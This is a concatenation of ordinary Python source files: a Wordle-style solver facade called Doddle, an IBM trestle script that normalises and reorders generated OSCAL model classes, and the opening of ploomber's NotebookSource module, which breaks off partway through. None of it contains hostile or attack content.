from __future__ import annotations from typing import Sequence, Union from .benchmarking import Benchmark, Benchmarker, NullBenchmarkReporter, SimulBenchmarker from .boards import Scoreboard from .engine import Engine, SimulEngine from .enums import SolverType from .factory import create_models from .solver import EntropySolver from .tree import TreeBuilder from .views import NullRunReporter from .words import Word WordType = Union[str, Word] class Doddle: """ A simple, facade class for running Doddle simulations. Attributes: size (int, optional): The word length. Defaults to 5. solver_type (SolverType, optional): Enum stating the solver heuristic to use. Defaults to SolverType.MINIMAX. depth (int, optional): Depth of the search - how many moves to look ahead. Defaults to 1. extras (Sequence[Word] | Sequence[str] | None, optional): Any extra words to include in Doddle's dictionary. Defaults to None. lazy_eval (bool, optional): Whether to lazily score words as and when they are seen or to score every word against every word upfront. Lazy evaluation results in quicker initialisation but slower solves. The opposite is true when lazy initialisation is disabled. It is recommended to disable lazy evaluation if you plan to run Doddle multiple times within the same session for greater performance. Defaults to True. reporter (RunReporter | None, optional): A class that provided real-time reports (callback) as the solve progresses. Defaults to None. Methods ------- __call__(answer, guess) Doddle is callable via: doddle = Doddle() scoreboard = doddle(answer=['SNAKE', 'FRUIT'], guess='APPLE') """ def __init__( self, size: int = 5, solver_type: SolverType | str = SolverType.MINIMAX, depth: int = 1, extras: Sequence[Word] | Sequence[str] | None = None, lazy_eval: bool = True, ): """Initialises a new instance of a Doddle object. Args: size (int, optional): The word length. Defaults to 5. solver_type (SolverType | str, optional): Enum stating the solver heuristic to use. Defaults to SolverType.MINIMAX. depth (int, optional): Depth of the search - how many moves to look ahead. Defaults to 1. extras (Sequence[Word] | Sequence[str] | None, optional): Any extra words to include in Doddle's dictionary. Defaults to None. lazy_eval (bool, optional): Whether to lazily score words as and when they are seen or to score every word against every word upfront. Lazy evaluation results in quicker initialisation but slower solves. The opposite is true when lazy initialisation is disabled. It is recommended to disable lazy evaluation if you plan to run Doddle multiple times within the same session for greater performance. Defaults to True. reporter (RunReporter | None, optional): A class that provided real-time reports (callback) as the solve progresses. Defaults to None. 
""" self.size = size e = [Word(extra) for extra in extras] if extras else [] if isinstance(solver_type, str): solve_type = SolverType.from_str(solver_type) else: solve_type = solver_type dictionary, scorer, histogram_builder, solver, simul_solver = create_models( size, solver_type=solve_type, depth=depth, extras=e, lazy_eval=lazy_eval, ) callback = NullRunReporter() benchmarkReporter = NullBenchmarkReporter() self.dictionary = dictionary self.scorer = scorer self.histogram_builder = histogram_builder self.engine = Engine(dictionary, scorer, histogram_builder, solver, callback) self.simul_engine = SimulEngine(dictionary, scorer, histogram_builder, simul_solver, callback) self.benchmarker = Benchmarker(self.engine, benchmarkReporter) self.simul_benchmarker = SimulBenchmarker(self.simul_engine, benchmarkReporter) def __call__( self, answer: WordType | Sequence[WordType], guess: WordType | Sequence[WordType] | None = None ) -> Scoreboard: """Callable that runs a Doddle game and returns the resulting scoreboard. Args: answer (WordType | Sequence[WordType]): A word intended to be the answer. Alternatively, a sequence of words if you wish to play Doddle in simultaneous mode. guess (WordType | Sequence[WordType] | None, optional): An optional word to be played as the opening guess. You can pass a list of guesses if you want to play several openers. Defaults to None. Raises: ValueError: If the provided words are invalid. Returns: Scoreboard: A scoreboard showing how the game played out. """ solns = self.__to_word_list(answer, "answer") guesses = self.__to_word_list(guess, "guess") if guess else [] size = len(solns[0]) missized_solns = [s.value for s in solns if len(s) != self.size] if missized_solns: message = f"All answers must be of length {self.size}: ({', '.join(missized_solns)}). " message += "To play Doddle with custom word lengths, please use the size argument when " message += "instantiating the Doddle object.\n\n" message += f"e.g.\n doddle = Doddle(size={size})" raise ValueError(message) missized_guesses = [g.value for g in guesses if len(g) != self.size] if missized_guesses: message = f'All guesses must be of size {self.size}: ({", ".join(missized_guesses)}). ' message += "To play Doddle with custom word lengths, please use the size argument when " message += "instantiating the Doddle object.\n\n" message += f"e.g.\n doddle = Doddle(size={len(missized_guesses[0])})" raise ValueError(message) score_matrix = self.engine.histogram_builder.score_matrix unknown_solns = [s.value for s in solns if s not in score_matrix.potential_solns] if unknown_solns: missing = ", ".join(unknown_solns) missing_extras = "', '".join(unknown_solns) message = f"The following answers are not known to Doddle: {missing}\n" message += "To play Doddle with custom words, please use the extras argument when " message += "instantiating the Doddle object.\n\n" message += f"e.g. doddle = Doddle(size={size}, ..., extras=['{answer}'])" raise ValueError(message) unknown_words = [g.value for g in guesses if g not in score_matrix.all_words] if unknown_words: missing = ", ".join(unknown_words) missing_extras = "', '".join(unknown_words) message = f"The following guesses are not known to Doddle: {missing}\n" message += "To play Doddle with custom words, please use the extras argument when " message += "instantiating the Doddle object.\n\n" message += f"e.g. 
doddle = Doddle(size={size}, ..., extras=['{missing_extras}'])" raise ValueError(message) if len(solns) == 1: game = self.engine.run(solns[0], guesses) return game.scoreboard simul_game = self.simul_engine.run(solns, guesses) return simul_game.scoreboard def benchmark(self, guess: WordType | Sequence[WordType] | None = None) -> Benchmark: self.histogram_builder.score_matrix.precompute() guesses = self.__to_word_list(guess, "guess") if guess else [] benchmark = self.benchmarker.run_benchmark(guesses) return benchmark def simul_benchmark( self, num_simul: int, num_rounds: int = 1000, guess: WordType | Sequence[WordType] | None = None ) -> Benchmark: self.histogram_builder.score_matrix.precompute() guesses = self.__to_word_list(guess, "guess") if guess else [] benchmark = self.simul_benchmarker.run_benchmark(guesses, num_simul, num_rounds) return benchmark def tree_search(self, guess: WordType | None = None) -> Benchmark: self.histogram_builder.score_matrix.precompute() opening_guess = Word(guess) if guess else Word("SALET") common_words = self.dictionary.common_words solver = EntropySolver(self.histogram_builder) tree_builder = TreeBuilder(self.dictionary, self.scorer, self.histogram_builder, solver) root_node = tree_builder.build(common_words, opening_guess) comma_separated_values = root_node.csv(False) return Benchmark.from_csv(comma_separated_values, False) @staticmethod def __to_word_list(words: WordType | Sequence[WordType] | None, label: str) -> list[Word]: if words is None: raise TypeError(f"The {label} cannot be None.") if isinstance(words, Word) or isinstance(words, str): soln = Word(words) return [soln] return [Word(g) for g in words]
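# --- Hedged usage sketch for the Doddle facade above --------------------------
# This mirrors the example in the class docstring: a Doddle instance is callable
# with an answer (or several answers for simultaneous mode) and an optional
# opening guess, and returns a Scoreboard. The words are purely illustrative;
# any word not in Doddle's dictionary must be supplied via the 'extras'
# argument, as the ValueError messages above explain.
if __name__ == "__main__":
    doddle = Doddle(size=5)
    scoreboard = doddle(answer="SNAKE", guess="APPLE")              # one game
    simul_board = doddle(answer=["SNAKE", "FRUIT"], guess="APPLE")  # simultaneous mode
    print(scoreboard)
    print(simul_board)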
# -*- mode:python; coding:utf-8 -*- # Copyright (c) 2020 IBM Corp. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Script to normalize oscal after significant changes with version 1.0.0. It then reorders the classes so there are minimal forwards required. This script is normally called by gen_oscal.py when models are generated. """ import logging import pathlib import re from trestle.oscal import OSCAL_VERSION_REGEX logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) logger.addHandler(logging.StreamHandler()) class_header = 'class ' # List of filestems not including 'complete' or 'common' # 'common' is generated by this script. 'complete.py' comes from NIST and is ignored fstems = ['assessment_plan', 'assessment_results', 'catalog', 'component', 'poam', 'profile', 'ssp'] alias_map = { 'assessment_plan': 'assessment-plan', 'assessment_results': 'assessment-results', 'catalog': 'catalog', 'component': 'component-definition', 'poam': 'plan-of-action-and-milestones', 'profile': 'profile', 'ssp': 'system-security-plan' } camel_map = { 'assessment_plan': 'AssessmentPlan', 'assessment_results': 'AssessmentResults', 'catalog': 'Catalog', 'component': 'ComponentDefinition', 'poam': 'PlanOfActionAndMilestones', 'profile': 'Profile', 'ssp': 'SystemSecurityPlan' } prefix_map = { 'assessment_plan': 'Ap', 'assessment_results': 'Ar', 'catalog': 'Cat', 'component': 'Comp', 'poam': 'Poam', 'profile': 'Prof', 'ssp': 'Ssp' } # these prefixes are stripped repeatedly from class names until no more changes prefixes_to_strip = [ 'OscalMetadata', 'OscalAssessmentCommon', 'OscalImplementationCommon', 'OscalComponentDefinition', 'OscalCatalog', 'OscalSsp', 'OscalPoam', 'OscalProfile', 'OscalAr', 'OscalAp', 'Common' ] license_header = ( '# -*- mode:python; coding:utf-8 -*-\n' '# Copyright (c) 2020 IBM Corp. 
All rights reserved.\n' '#\n' '# Licensed under the Apache License, Version 2.0 (the "License");\n' '# you may not use this file except in compliance with the License.\n' '# You may obtain a copy of the License at\n' '#\n' '# https://www.apache.org/licenses/LICENSE-2.0\n' '#\n' '# Unless required by applicable law or agreed to in writing, software\n' '# distributed under the License is distributed on an "AS IS" BASIS,\n' '# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n' '# See the License for the specific language governing permissions and\n' '# limitations under the License.\n' ) main_header = """ from __future__ import annotations from datetime import datetime from enum import Enum from typing import Any, Dict, List, Optional from pydantic import AnyUrl, EmailStr, Extra, Field, conint, constr from trestle.core.base_model import OscalBaseModel """ class RelOrder(): """Capture relative location of each class in list to its refs and deps.""" def __init__(self, max_index): """Initialize with size of list being reordered.""" self.latest_dep = 0 self.earliest_ref = max_index class ClassText(): """Hold class text as named blocks with references to the added classes and capture its refs.""" def __init__(self, first_line, parent_name): """Construct with first line of class definition and store the parent file name.""" self.lines = [first_line.rstrip()] n = first_line.find('(') self.name = first_line[len(class_header):n] self.parent_names = [parent_name] self.original_name = self.name self.unique_name = None self.refs = set() self.full_refs = set() self.found_all_links = False self.is_self_ref = False self.is_local = False self.body_text = None def add_line(self, line): """Add new line to class text.""" self.lines.append(line) def add_ref_if_good(self, ref_name): """Add non-empty refs that are not in common.""" if ref_name and 'common.' 
not in ref_name:
            self.refs.add(ref_name)

    def add_ref_pattern(self, p, line):
        """Add refs for new class names found based on pattern."""
        new_refs = p.findall(line)
        if new_refs:
            for r in new_refs:
                if isinstance(r, tuple):
                    for s in r:
                        self.add_ref_if_good(s)
                else:
                    self.add_ref_if_good(r)

    @staticmethod
    def find_index(class_text_list, name):
        """Find index of class in list by name."""
        nclasses = len(class_text_list)
        for i in range(nclasses):
            if class_text_list[i].name == name:
                return i
        return -1

    def generate_body_text(self):
        """Get body text with whitespace removed."""
        # The body starts after the first colon
        full_text = ''
        for line in self.lines:
            # this adds the line with whitespace removed
            full_text += ''.join(line.split(' '))
        colon = full_text.find(':')
        self.body_text = full_text[colon:]

    @staticmethod
    def generate_all_body_text(classes):
        """Get the body of all classes into text."""
        new_classes = []
        for c in classes:
            c.generate_body_text()
            new_classes.append(c)
        return new_classes

    def bodies_equal(self, other):
        """Are class bodies equal with whitespace ignored."""
        return self.body_text == other.body_text

    def add_all_refs(self, line):
        """Find all referenced class names in the line and add them to the refs."""
        # find lone strings with no brackets
        p = re.compile(r'.*\:\s*([^\s\[\]]+).*')
        self.add_ref_pattern(p, line)
        # find objects in one or more bracket sets with possible first token and comma
        p = re.compile(r'.*\[(?:(.*),\s*)?((?:\[??[^\[]*?))\]')
        self.add_ref_pattern(p, line)
        # add refs found in optional unions
        p = re.compile(r'.*Optional\[Union\[([^,]+)')
        self.add_ref_pattern(p, line)
        return line

    def find_direct_refs(self, class_names_list):
        """Find direct refs without recursion."""
        for ref in self.refs:
            if ref == self.name:
                self.is_self_ref = True
            if ref in class_names_list and ref != self.name:
                self.full_refs.add(ref)
        if len(self.full_refs) == 0:
            self.found_all_links = True

    def find_order(self, class_text_list):
        """Find latest dep and earliest reference."""
        ro = RelOrder(len(class_text_list) - 1)
        # find first class that needs this class
        for i, ct in enumerate(class_text_list):
            if self.name in ct.full_refs:
                ro.earliest_ref = i
                break
        # find last class this one needs
        # make sure result is deterministic and does not depend on order from set
        sorted_ref_list = sorted(self.full_refs)
        for ref in sorted_ref_list:
            n = ClassText.find_index(class_text_list, ref)
            if n > ro.latest_dep:
                ro.latest_dep = n
        return ro

    def strip_prefix(self, prefix):
        """Strip the prefix from the class name only."""
        if self.name.startswith(prefix) and self.name != prefix:
            self.name = self.name.replace(prefix, '', 1)
            return True
        return False


def find_forward_refs(class_list, orders):
    """Find forward references within the file."""
    forward_names = set()
    for c in class_list:
        if c.is_self_ref:
            forward_names.add(c.name)
    for i in range(len(orders)):
        if orders[i].earliest_ref < i:
            forward_names.add(class_list[i].name)
    forward_refs = []
    for c in class_list:
        if c.name in forward_names:
            forward_refs.append(f'{c.name}.update_forward_refs()')
    return forward_refs


def reorder(fstem, class_list):
    """Reorder the class list based on the location of its refs and deps."""
    # build list of all class names defined in file
    all_class_names = []
    for c in class_list:
        all_class_names.append(c.name)
    dups = {x for x in all_class_names if all_class_names.count(x) > 1}
    if len(dups) > 0:
        logger.error(f'ERROR Duplicate classes in {fstem}: {" ".join(dups)}')
    # find direct references for each class in list
    for n, c in enumerate(class_list):
c.find_direct_refs(all_class_names) class_list[n] = c # with full dependency info, now reorder the classes to remove forward refs did_swap = True loop_num = 0 orders = None while did_swap and loop_num < 1000: did_swap = False orders = [] # find the relative placement of each class in list to its references and dependencies for c in class_list: ro = c.find_order(class_list) orders.append(ro) # find first class in list out of place and swap its dependency upwards, then break/loop to find new order for i, ro in enumerate(orders): if ro.latest_dep <= i <= ro.earliest_ref: continue # pop the out-of-place earliest ref and put it in front ct = class_list.pop(ro.earliest_ref) class_list.insert(i, ct) did_swap = True break loop_num += 1 if did_swap: logger.info('Excess iteration in reordering!') forward_refs = find_forward_refs(class_list, orders) # return reordered list of classes with no forward refs return class_list, forward_refs def constrain_oscal_version(class_list): """Constrain allowed oscal version.""" for j in range(len(class_list)): cls = class_list[j] for i in range(len(cls.lines)): line = cls.lines[i] nstart = line.find('oscal_version:') if nstart >= 0: nstr = line.find('str') if nstr >= 0: cls.lines[i] = line.replace('str', f'constr(regex={OSCAL_VERSION_REGEX})') class_list[j] = cls return class_list def load_classes(fstem): """Load all classes from a python file.""" all_classes = [] header = [] forward_refs = [] class_text = None done_header = False fname = pathlib.Path('trestle/oscal/tmp') / (fstem + '.py') with open(fname, 'r', encoding='utf8') as infile: for r in infile.readlines(): # collect forward references if r.find('.update_forward_refs()') >= 0: forward_refs.append(r) elif r.find(class_header) == 0: # start of new class done_header = True if class_text is not None: # we are done with current class so add it all_classes.append(class_text) class_text = ClassText(r, fstem) else: if not done_header: # still in header header.append(r.rstrip()) else: # this may not be needed p = re.compile(r'.*Optional\[Union\[([^,]+),.*List\[Any\]') refs = p.findall(r) if len(refs) == 1: logger.info(f'Replaced Any with {refs[0]} in {fstem}') r_orig = r r = r.replace('List[Any]', f'List[{refs[0]}]') logger.info(f'{r_orig} -> {r}') class_text.add_line(r.rstrip()) all_classes.append(class_text) # don't forget final class # force all oscal versions to the current one all_classes = constrain_oscal_version(all_classes) return all_classes def load_all_classes(): """Load all classes from all files on per file basis.""" all_classes = [] for fstem in fstems: all_classes.extend(load_classes(fstem)) return all_classes def keep_distinct(a, b): """If class names don't resolve to the same value then keep separate.""" # It is possible two classes with very different names have the same bodies # This is allowed if the names are different enough since they provide useful context stripped_classes = strip_prefixes([a, b]) a = stripped_classes[0] b = stripped_classes[1] if a.name == b.name: return False return True def find_unique_classes(all_classes): """Find unique classes based mainly on bodies.""" unique_classes = [] all_classes = ClassText.generate_all_body_text(all_classes) for a in all_classes: # ignore the Model class - it is added at end if a.name == 'Model': continue is_unique = True for i, u in enumerate(unique_classes): if a.bodies_equal(u): if keep_distinct(a, u): continue is_unique = False unique_classes[i].parent_names.append(a.parent_names[0]) break if is_unique: a.unique_name = a.name 
unique_classes.append(a)
    return unique_classes


def strip_prefixes(classes):
    """Strip prefixes from class names."""
    new_classes = []
    # are we stripping all names in a file
    full_file = len(classes) > 2
    all_names = [c.name for c in classes]
    for c in classes:
        made_change = True
        # keep stripping until clean
        while made_change:
            made_change = False
            for prefix in prefixes_to_strip:
                if c.strip_prefix(prefix):
                    # if we generated a collision with existing name, append integer
                    if full_file and c.name in all_names:
                        ii = 1
                        while f'{c.name}{ii}' in all_names:
                            ii += 1
                        c.name = f'{c.name}{ii}'
                    made_change = True
        new_classes.append(c)
    return new_classes


def fix_clashes(classes):
    """Fix clashes in names."""
    # If two classes have the same name and different bodies, adjust each name
    # Leave bodies alone
    # each new class name will be local to its one parent file
    nclasses = len(classes)
    changes = []
    for i in range(nclasses):
        for j in range(i + 1, nclasses):
            if classes[i].name == classes[j].name:
                a = classes[i]
                b = classes[j]
                if a.bodies_equal(b):
                    continue
                a_parents = a.parent_names
                b_parents = b.parent_names
                for a_parent in a_parents:
                    for b_parent in b_parents:
                        a_pre = prefix_map[a_parent]
                        a_new = a.name if a.name.startswith(a_pre) else a_pre + '_' + a.name
                        b_pre = prefix_map[b_parent]
                        b_new = b.name if b.name.startswith(b_pre) else b_pre + '_' + b.name
                        changes.append((a_parent, a.name, a_new))
                        changes.append((b_parent, b.name, b_new))
    # now make the actual class name changes
    new_classes = []
    for c in classes:
        for change in changes:
            for parent_name in c.parent_names:
                # find the one class with parent that matches the change - and change only its name
                if parent_name == change[0] and c.name == change[1]:
                    c.name = change[2]
                    # mark the class as local to the one file
                    c.is_local = True
                    break
        new_classes.append(c)
    return new_classes


def token_in_line(line, token):
    """Find if token is present in string."""
    # the second regex needs to include digits for Base64 vs. Base, Type vs. Type1 etc.
pattern = r'(^|[^a-zA-Z_]+)' + token + r'($|[^a-zA-Z0-9_]+)' p = re.compile(pattern) hits = p.findall(line) return len(hits) > 0 def replace_token(line, str1, str2): """Replace token str1 with new str2 in line.""" # pull out what you want to keep on left and right # rather than capture what you want and replace it if str1 not in line: return line pattern = r'(^|.*[^a-zA-Z_]+)' + str1 + r'($|[^a-zA-Z0-9_]+.*)' line = re.sub(pattern, r'\1' + str2 + r'\2', line) return line def is_common(cls): """Class is not common if _ in name or only one parent.""" if '_' in cls.name: return False if len(cls.parent_names) == 1: return False return True def _list_to_file_classes(classes): file_classes = {} for stem in fstems: file_classes[stem] = [] file_classes['common'] = [] for c in classes: file_classes[c.parent_names[0]].append(c) return file_classes def _file_classes_to_list(file_classes, exclude_common): classes = [] for item in file_classes.items(): if item[0] == 'common' and exclude_common: continue for c in item[1]: classes.append(c) return classes def refine_split(file_classes): """Make sure no references in common link to the other files.""" # get list of original names in current common file common_names = [] for c in file_classes['common']: common_names.append(c.unique_name) # find all original names of classes in other files that shouldn't be refd by common names = set() for stem in fstems: for c in file_classes[stem]: if (c.is_local) or (c.unique_name not in common_names): names.add(c.unique_name) names = list(names) # if any common class references outside common - exclude it from common not_com = [] for c in file_classes['common']: excluded = False for line in c.lines: if excluded: break if '"' not in line and "'" not in line: for name in names: if token_in_line(line, name): not_com.append(c.name) excluded = True break # remove all not_com from com and add to other files as needed by parents new_com = [] for c in file_classes['common']: if c.name in not_com: for parent in c.parent_names: file_classes[parent].append(c) else: new_com.append(c) file_classes['common'] = new_com return file_classes def _find_in_classes(name, file_classes): # debugging utility found = [] for item in file_classes.items(): for c in item[1]: if name in c.name: found.append((item[0], c.name)) return found def _find_in_class_list(name, classes): # debugging utility found = [] for c in classes: if name in c.name: found.append((name, c.name)) return found def split_classes(classes): """Split into separate common and other files.""" file_classes = {} for stem in fstems: file_classes[stem] = [] file_classes['common'] = [] com_names = [] for c in classes: if is_common(c): if c.name not in com_names: com_names.append(c.name) file_classes['common'].append(c) else: # remove clash prefix from the class name if present # the prefix is removed from bodies after the split c.name = c.name.split('_')[-1] for parent in c.parent_names: # the class carries with it that it is local and bound to the parent file_classes[parent].append(c) # keep removing classes in com that have external dependencies until it is clean new_ncom = 0 while new_ncom != len(file_classes['common']): new_ncom = len(file_classes['common']) file_classes = refine_split(file_classes) return file_classes def reorder_classes(fstem, classes): """Reorder the classes to minimize needed forwards.""" classes = sorted(classes, key=lambda c: c.name) new_classes = [] for c in classes: for line in c.lines: _ = c.add_all_refs(line) new_classes.append(c) reordered, forward_refs 
= reorder(fstem, new_classes) return reordered, forward_refs def write_oscal(classes, forward_refs, fstem): """Write out oscal.py with all classes in it.""" with open(f'trestle/oscal/{fstem}.py', 'w', encoding='utf8') as out_file: is_common = fstem == 'common' out_file.write(license_header) out_file.write('\n') out_file.write(main_header) if not is_common: out_file.write('import trestle.oscal.common as common\n') out_file.write('\n\n') for c in classes: out_file.writelines('\n'.join(c.lines) + '\n') if not is_common: out_file.writelines('class Model(OscalBaseModel):\n') alias = alias_map[fstem] snake = alias.replace('-', '_') class_name = camel_map[fstem] if '-' in alias: out_file.writelines(f" {snake}: {class_name} = Field(..., alias='{alias}')\n") else: out_file.writelines(f' {snake}: {class_name}\n') if forward_refs: if not is_common: out_file.writelines('\n\n') out_file.writelines('\n'.join(forward_refs) + '\n') def apply_changes_to_class_list(classes, changes): """Make all changes to the name and body of a list of classes.""" for i, c in enumerate(classes): lines = [] for line in c.lines: if 'title=' not in line and 'description=' not in line: for item in changes: if item[0] in line: line = replace_token(line, item[0], item[1]) lines.append(line) classes[i].lines = lines # make sure class definition has correct name paren = lines[0].find('(') class_name = classes[i].name if paren > 0: class_name = lines[0][len('class '):paren] classes[i].name = class_name # need to regenerate body since tokens changed classes[i].generate_body_text() return classes def apply_changes_to_classes(file_classes, changes, com_names): """Apply changes to dict of classes organized by file.""" for fc in file_classes.items(): classes = fc[1] for i, c in enumerate(classes): lines = [] for line in c.lines: if 'title=' not in line and 'description=' not in line: for item in changes.items(): if item[0] not in line: continue new_name = item[1] # if not in common then need to add common. to common names if fc[0] != 'common' and new_name in com_names: tentative_name = 'common.' + new_name if tentative_name not in line: new_name = tentative_name line = replace_token(line, item[0], new_name) lines.append(line) classes[i].lines = lines # class name may have been replaced by change - so update with new name paren = lines[0].find('(') class_name = classes[i].name if paren > 0: class_name = lines[0][len('class '):paren] classes[i].name = class_name classes[i].generate_body_text() file_classes[fc[0]] = classes return file_classes def reorder_and_dump_as_python(file_classes): """Reorder the files and dump.""" for item in file_classes.items(): ordered, forward_refs = reorder_classes(item[0], item[1]) write_oscal(ordered, forward_refs, item[0]) def find_full_changes(file_classes): """Find all name changes and what files made them.""" changes = {} com_names = [] for c in file_classes['common']: changes[c.unique_name] = c.name com_names.append(c.name) for fstem in fstems: for c in file_classes[fstem]: changes[c.unique_name] = c.name return changes, com_names def kill_min_items(classes): """Kill all references to min_items=1.""" # NOTE! 
This changes all constr list to normal List for i, c in enumerate(classes): for j, line in enumerate(c.lines): c.lines[j] = line.replace(', min_items=1', '') classes[i] = c return classes def fix_include_all(classes): """Replace [IncludeAll] with [Any].""" for i, c in enumerate(classes): for j, line in enumerate(c.lines): c.lines[j] = line.replace('[IncludeAll]', '[Any]') classes[i] = c return classes def strip_file(classes): """Given set of classes from a file strip all names and apply changes to references in the bodies.""" classes = strip_prefixes(classes) changes = [] for c in classes: changes.append((c.original_name, c.name)) return apply_changes_to_class_list(classes, changes) def _strip_all_files(file_classes): for item in file_classes.items(): stem = item[0] if item[0] != 'common': file_classes[stem] = strip_file(file_classes[stem]) return file_classes def update_refs_per_file(classes): """Change all refs to the _ versions.""" changes = [] for c in classes: if '_' in c.name: changes.append((c.name.split('_')[1], c.name)) classes = apply_changes_to_class_list(classes, changes) return classes def normalize_files(): """Clean up classes to minimise cross reference.""" all_classes = load_all_classes() # kill the min_items immediately uc = kill_min_items(all_classes) # fix IncludeAll that isn't defined properly in schema uc = fix_include_all(all_classes) # organize in a dict with filename as key file_classes = _list_to_file_classes(all_classes) # strip all names and bodies file_classes = _strip_all_files(file_classes) # convert dict to single list of classes with expected duplicates uc = _file_classes_to_list(file_classes, True) # find all unique classes based on body text uc = find_unique_classes(uc) # find classes with same name and different bodies - and modify class names with _ # bodies are not changed uc = fix_clashes(uc) # now have unique list of classes with unique names # some names have _ in them to be removed later # make sure all classes have the proper unique name set at this point for c in uc: c.unique_name = c.name # some class names have _ in them, so change refs in each file to include the _ uc = update_refs_per_file(uc) # split the classes based on current name and whether referenced by only one file file_classes = split_classes(uc) # find all changes from old name to new changes, com_names = find_full_changes(file_classes) # now apply all the changes to the class bodies file_classes = apply_changes_to_classes(file_classes, changes, com_names) # re-order them in each file and dump reorder_and_dump_as_python(file_classes) # this will leave files with raw formatting and make code-format must be run separately if __name__ == '__main__': """Main invocation.""" normalize_files()
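

# Hedged usage sketch (editorial addition, not part of the generated script):
# illustrates the whole-token semantics of token_in_line() and replace_token()
# defined above. The trailing guard [^a-zA-Z0-9_] rejects digits, so the token
# 'Base' does not match inside 'Base64'. Expected results are derived by hand
# from the regexes above, not from a verified run.
def _demo_token_helpers():
    assert token_in_line('x: Optional[Base] = None', 'Base')
    assert not token_in_line('x: Optional[Base64] = None', 'Base')
    assert replace_token('x: Base = None', 'Base', 'CatBase') == 'x: CatBase = None'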
""" On languages and kernels ------------------------ NotebookSource represents source code in a Jupyter notebook format (language agnostic). Apart from .ipynb, we also support any other extension supported by jupytext. Given a notebook, we have to know which language it is written in to extract upstream/product variables (though this only happens when the option of extracting dependencies automatically is on), we also have to determine the Jupyter kernel to use (this is always needed). The unequivocal place to store this information is in the notebook metadata section, but given that we advocate for the use of scripts (converted to notebooks via jupytext), they most likely won't contain metadata (metadata saving is turned off by default in jupytext), so we have to infer this ourselves. To make things more complex, jupytext adds its own metadata section but we are ignoring that for now. Given that there are many places where this information might be stored, we have a few rules to automatically determine language and kernel given a script/notebook. """ from functools import wraps import ast from pathlib import Path import warnings from contextlib import redirect_stdout from io import StringIO from copy import deepcopy # papermill is importing a deprecated module from pyarrow with warnings.catch_warnings(): warnings.simplefilter('ignore', FutureWarning) from papermill.parameterize import parameterize_notebook import click import nbformat import jupytext from jupytext import cli as jupytext_cli from jupytext.formats import long_form_one_format, short_form_one_format from jupytext.config import JupytextConfiguration import parso from ploomber.exceptions import (SourceInitializationError, MissingParametersCellError) from ploomber.placeholders.placeholder import Placeholder from ploomber.util import requires from ploomber.sources.abc import Source from ploomber.sources.nb_utils import find_cell_with_tag, find_cell_with_tags from ploomber.static_analysis.extractors import extractor_class_for_language from ploomber.static_analysis.pyflakes import check_notebook from ploomber.sources import docstring from ploomber.io import pretty_print def _jupytext_fmt(primitive, extension): """ Determine the jupytext fmt string to use based on the content and extension """ if extension != 'ipynb': fmt, _ = jupytext.guess_format(primitive, f'.{extension}') fmt_final = f'{extension}:{fmt}' else: fmt_final = '.ipynb' return fmt_final # TODO: we should unit test that this function is called, as opposed to vanilla # .read_text def _read_primitive(path): """ We read using the UTF-8 instead of the default encoding since notebooks are always stored in UTF-8. We can see this in nbformat, which always reads as UTF-8: https://github.com/jupyter/nbformat/blob/df63593b64a15ee1c37b522973c39e8674f93c5b/nbformat/__init__.py#L125 Scripts are a different story since they may have other encodings, however, modern editors have UTF-8 as default (example: VSCode https://docs.microsoft.com/en-us/powershell/scripting/dev-cross-plat/vscode/understanding-file-encoding?view=powershell-7.2#configuring-vs-code) so it's safer to use UTF-8 than the default encoding. 
jupytext already does this:
    https://github.com/mwouts/jupytext/issues/896
    """
    return Path(path).read_text(encoding='utf-8')


def _get_last_cell(nb):
    """
    Get last cell, ignores cells with empty source (unless the notebook only
    has one cell and it's empty)
    """
    # iterate in reverse order
    for idx in range(-1, -len(nb.cells) - 1, -1):
        cell = nb.cells[idx]
        # only return it if it has some code
        if cell['source'].strip():
            return cell
    # otherwise return the first cell
    return nb.cells[0]


def _get_cell_suggestion(nb):
    format_name = nb.metadata.get('jupytext',
                                  {}).get('text_representation',
                                          {}).get('format_name')
    preamble = 'Add a new cell with your code'

    if format_name == 'light':
        message = f'{preamble}:\n' + """
# + tags=["parameters"]
# your parameters here...
# -

# +
# your code here...
# -
"""
    elif format_name == 'percent':
        message = f'{preamble}:\n' + """
# %% tags=["parameters"]
# your parameters here...

# %%
# your code here...
"""
    else:
        message = preamble + '.'

    return message


def requires_path(func):
    """
    Checks if NotebookSource instance was initialized from a file, raises
    an error if not
    """

    @wraps(func)
    def wrapper(self, *args, **kwargs):
        if self._path is None:
            raise ValueError(f'Cannot use {func.__name__!r} if notebook was '
                             'not initialized from a file')
        return func(self, *args, **kwargs)

    return wrapper


class NotebookSource(Source):
    """
    A source object representing a jupyter notebook (or any format supported
    by jupytext)

    Parameters
    ----------
    hot_reload : bool, optional
        Makes the notebook always read the file before rendering

    kernelspec_name : str, optional
        Which kernel to use for executing the notebook, it overrides any
        existing kernelspec metadata in the notebook. If the notebook does
        not have kernelspec info, this parameter is required. Defaults to
        None. To see which kernelspecs are available run "jupyter
        kernelspec list"

    check_if_kernel_installed : bool, optional
        Check if the kernel is installed during initialization

    Notes
    -----
    The render method prepares the notebook for execution: it adds the
    parameters and it makes sure kernelspec is defined
    """

    @requires([
        'parso', 'pyflakes', 'jupytext', 'nbformat', 'papermill',
        'jupyter_client'
    ])
    def __init__(self,
                 primitive,
                 hot_reload=False,
                 ext_in=None,
                 kernelspec_name=None,
                 static_analysis='regular',
                 check_if_kernel_installed=True):
        # any non-py file must first be converted using jupytext, we need
        # that representation for validation, if input is already a .py file
        # do not convert. If passed a string, try to guess format using
        # jupytext. We also need ipynb representation for .develop(),
        # but do lazy loading in case we don't need both
        self._primitive = primitive
        self._check_if_kernel_installed = check_if_kernel_installed

        # this happens if using SourceLoader
        if isinstance(primitive, Placeholder):
            self._path = primitive.path
            self._primitive = str(primitive)
        elif isinstance(primitive, str):
            self._path = None
            self._primitive = primitive
        elif isinstance(primitive, Path):
            self._path = primitive

            if primitive.is_dir():
                raise SourceInitializationError(
                    f'Failed to initialize {str(primitive)!r}. '
                    'Expected a file, got a directory.' +
                    _suggest_ploomber_scaffold_is_dir())

            if not primitive.exists():
                raise SourceInitializationError(
                    f'Failed to initialize {str(primitive)!r}. '
                    'File does not exist.'
